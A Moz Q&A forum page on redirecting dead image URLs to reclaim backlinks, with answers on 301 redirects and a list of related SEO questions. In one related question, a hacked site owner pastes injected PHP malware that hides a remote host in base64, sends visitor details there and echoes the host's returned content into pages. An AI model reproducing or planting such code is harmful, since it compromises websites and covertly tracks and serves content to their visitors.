Image redirection: Will it helps or hurts?
-
Hi all,
There are some old images (non-existing now) from our website which have backlinks. We would like to redirect them to some live images to reclaim the backlinks. Is this Okay or sounds suspicious to Google?
Thanks
-
Hi there,
The less 301's from external sources the better. The situation with 301's is like this: Page A links to page B but page B is redirected to page C (your page). If you reduce the second step (page B), you won't be losing as much link juice and you will make it easier for crawler as well. Reach out to the webmasters of websites which you have the back links from (pages A) try to convince them to link directly to the page C instead of page B.
Hope it helps. If you have any other questions, let me know. Cheers, Martin
-
Hi Martin,
Here I have question about 301 on my mind for long time. We avoid 301 redirects internally which will not cause page slow loading. What about 301 redirects for the links referred from external sources? I mean page A has been mentioned on a external website which has been redirected to page B?
-
Hi there,
well, with the redirects - you will lose some amount of the link juice but not really a lot (1 - 10%).
However, try to convince the admins of the sites to change URLs to the new ones. It's always better to avoid 301's if you can.
Cheers, Martin
-
You can redirect all images on a new path. It will not hurt you.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Inbound Links - Redirect, Leave Alone, etc
Hi, I recently download the inbound links report for my client to look for some opportunities. When they switched to our platform a couple years ago, the format of some of their webpages change, so a number of these inbound links are going to an error page and should be redirected. However, some of these are spammy. In that case, someone recommended to me to disavow them but still redirect anyway. In other cases, some were "last seen" a year or two ago, so when I try to go to the URL the link is coming from, I also get an error page. Should I bother to redirect in these cases? Should I disavow in both cases? Or leave them alone? Thanks for any input!
White Hat / Black Hat SEO | | AliMac261 -
Backlink Indexing - will this technique hurt or help?
So I came across this idea on YouTube: Indexing your backlinks. I understand its not enough to just have google crawl your pages - you want them indexed. So, if you create backlinks on say a blog or social profile, will it benefit you to have them submitted to other popular blogs, news / pr sites, video channels - of which may be unrelated - for the sole purpose of getting them not just crawled but indexed? There are SEO companies that I have seen that claim they do exactly that (publish your backlinks all over the web - making backlinks for backlinks) but in reality is this a good thing or a bad thing? Could this help rankings or hurt them?
White Hat / Black Hat SEO | | momentum_technology_services0 -
I'm seeing thousands of no-follow links on spam sites. Can you help figure it out?
I noticed that we are receiving thousands of links from many different sites that are obviously disguised as something else. The strange part is that some of them are legitimate sites when you go to the root. I would say 99% of the page titles read something like : 1 Hour Loan Approval No Credit Check Vermont, go cash advance - africanamericanadaa.com. Can someone please help me? Here are some of the URL's we are looking at: http://africanamericanadaa.com/genialt/100-dollar-loans-for-people-with-no-credit-colorado.html http://muratmakara.com/sickn/index.php?recipe-for-cone-06-crackle-glaze http://semtechblog.com/tacoa/index.php?chilis-blue-raspberry-margarita http://wesleygcook.com/rearc/guaranteed-personal-loans-oregon.html
White Hat / Black Hat SEO | | TicketCity0 -
How did I get over 1000 backlinks in less then a month? help?
Hi Guys I'm a newbie and just started my website, im wondering if im reading this correctly, i use a tool called my seo tools and its telling me my website zenory.co.nz has over 1600 backlinks, this is scary since the site is only 5months old and i didn't see this till at least today and i check my sites backlinks on a regular basis. However when I check with moz it says I only have 2? I'm a little confused. Any advice here? Much appreciated Thanks
White Hat / Black Hat SEO | | edward-may0 -
Redirecting from https to http - will pass whole link juice to new http website pages?
Hi making permanent 301 redirection from https to http - will pass whole link juice to new http website pages?
White Hat / Black Hat SEO | | Aman_1230 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Redesign Troubleshooting Help
We launched a redesign at the end of May and soon after, our website was de-indexed from Google. Here are the changes that I implemented so far to try to fix this issue: 301 redirect chain - We changed all our URLs and implemented 301 redirects. However, these are multiple redirects meaning 1 URL redirects to a second and then a 3rd. I was told that this could confuse Google. For example: http://cncahealth.com 301s to http://www.cncahealth.com 301s to https://www.cncahealth.com We wrote a rule for each variation of the URL and not there is only a one to one 301 redirect and this was validated with urivalet.com. Canonical tags did not match URL - We created the new website in a CMS where the CMS generated non-SEO friendly URLs. We applied 301 redirects to those CMS URLs, but when we enable canonical tags within the CMS, it uses the original CMS URL and not the URL of the page, so the canonical URL doesn't match the page. For now, I disabled canonical tags until I can figure out a way to manually insert canonical tag code in the pages without using the CMS canonical tag feature. After doing these two fixes our website still doesn't seem like it is able to get re-indexed by Google even when I submit the sitemap in Google Webmaster Tools...the sitemap doesn't get indexed? Questions...there are two more concerns that I am hoping can be answered in this community: Cache-Control = private : I saw from URIvalet.com that our cache-control is set to private. Is this affecting us being indexed and should this be set to public? Load Balancer - Our old website was not on a load balancer, but our new website is. When I look in our analytics at servers, I notice that the site is being picked up on one server and then another server at different times. Is Google seeing the same thing and is the load balancer confusing Google? I'm not sure what else could be an issue with us not being indexed. Maybe its just a waiting game where after I implemented the 1 & 2 change I just have to wait or does 3 & 4 or other issues also need to be addressed in order to get re-indexed? I hope someone can help me. Thanks!
White Hat / Black Hat SEO | | rexjoec0 -
Buying a website and redirecting everything
We are considering purchasing an existing website in our industry with a domain authority of 52 and 20K inlinks and redirecting it to our new website with a domain authority of 26 and 1,000 inlinks. Would this be the best way to improve our new site's authority and inlinks? Would Google penalize us for doing that or would it effectively transfer the old sites authority to us?
White Hat / Black Hat SEO | | pbhatt0